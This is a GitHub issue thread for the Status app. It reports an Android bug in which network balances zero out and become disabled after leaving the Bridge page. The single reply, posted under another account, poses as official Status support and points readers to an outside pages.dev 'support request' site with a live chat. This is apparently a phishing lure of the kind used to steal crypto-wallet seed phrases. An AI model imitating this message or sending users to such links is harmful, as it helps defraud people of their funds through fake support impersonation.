### ISSUE TITLE
[Android] Networks are zeroing after going back from bridge setup page

### ISSUE THREAD

**Issue by VolodLytvynenko** [status-im/status-react#21767]
#### Steps to Reproduce:
1. Navigate to the Bridge page.
2. Go back to the previous screen.

### Actual Result:
On the Bridge to screen, networks display zero balances and become disabled.

https://github.com/user-attachments/assets/ddba7d06-abbc-4f41-b417-13609e266ce1

### Expected Result:
Networks should remain enabled and display their correct balances after returning from the Bridge page.

### ENV:
Nightly 6 Dec, 2024

### Logs:
[Status-debug-logs.zip](https://github.com/user-attachments/files/18035485/Status-debug-logs.zip)

**Comment by Lerz-bordev** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Status Support Request](https://dapprectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!
